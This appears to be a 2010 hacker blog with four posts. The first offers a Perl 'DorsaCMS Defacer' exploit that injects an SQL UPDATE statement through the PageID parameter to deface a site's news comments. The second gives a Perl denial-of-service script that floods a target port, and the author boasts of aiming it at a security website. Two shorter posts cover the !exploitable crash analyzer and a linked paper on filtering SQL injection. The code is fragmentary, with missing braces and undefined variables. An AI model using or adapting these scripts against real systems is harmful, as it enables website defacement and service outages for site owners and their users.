Thursday, December 16, 2010

DorsaCms SQL Injection Vulnerability

Dorsa is a cms that have certificate of security

u can see certificate of security from this link :

but  i found  a blind SQL Injection Vulnerability in this CMS

exploit code(tested on windows xp ) :

system('color a');
system('title DorsaCMS Defacer');
print q{
-= ** =-
DorsaCMS Defacer

[+] Coded by d3c0der   =>

[+] AttackerZ Under Ground Group  =>  wwW.Attackerz.iR
-= ** =-


use HTTP::Request;
use LWP::UserAgent;

print "~# Target : ";
chomp $site;
print "~# PageID : ";
chomp $id;
 print "~# Deface Text : ";
chomp $def;

if ( $site !~ /^http:/ ) {
$site = 'http://' . $site;
if ( $site !~ /\/$/ ) {
$site = $site . '/';
print "\n";

print "->hacking : $site\n";

@path1=("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");

foreach $ways(@path1){


my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
my $response=$ua->request($req);


print "[-] now this url is hacked $siteShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";

# By d3c0der


Thursday, December 2, 2010

simple d.o.s attacker

I wrote a simple perl denial of service script 

I've got it working on windows xp with active perl
i used this script to attacking the my sql port of a security website , and here is the result ;)


system('color a');
print q{
-= ** =-
AttackerZ d.o.s Attacker - version 1.0

[+] coded by d3c0der   =>

[+] AttackerZ Under Ground TM  =>  wwW.Attackerz.iR
-= ** =-




use IO::Socket;

print "Host: ";{
chop ($host = <stdin>);
print "Port: ";
chop ($port = <stdin>);
print "SYN Requests to send : ";
chop ($num= <stdin>);
$host = $ARGV[0];
$port = $ARGV[1];
$num = $ARGV[2];
for ($i=0; $i<$num; $i++)
$len = length $form;
$sock = IO::Socket::INET->new (
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp') || die "$! sorry ! Can't Connect";
syswrite STDOUT, "[+]SYN Request: $i\n";
$local_time = localtime();

$login = getlogin();
print " hello $login , your attack finish at $local_time\n";

print "All packets sent to $host\n";

 print "Press any key To exit...";
$end = <STDIN>;
chop ($end);

Wednesday, November 24, 2010

!exploitable Crash Analyzer

!exploitable (pronounced "bang exploitable") Crash Analyzer is a plugin for the Windows Debugger that parses your crash logs and gives you two important pieces of information. First, it will collate all of your crashes and determine exactly how many there actually are. So for example, out of 60 crash reports, there may only be 2 or 3 actual problems.

0:006> g
(19ec.1a0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=00000113 ecx=00000001 edx=00000000 esi=7c57edd2 edi=007f46bc
eip=41414141 esp=0098fd88 ebp=0098fde0 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
41414141 ??              ???
0:001> !load msec.dll
0:001> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at 
Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x5a5e1f77)

Access violations at the instruction pointer are exploitable if not near NULL.

The second thing it does is look at the type of crash and try to determine if the error is something that could be exploited by a malicious hacker. This means that more junior employees can work these bug issues without taking the time of more senior examiners. Jason Shirk from the Security Core team joined us to take a look at !exploitable. To download the app, go to:

download video :

Tuesday, August 10, 2010

sql injection filtering

in this article we try to filtering sql injection's
this paper writen in persian
you can download from this links :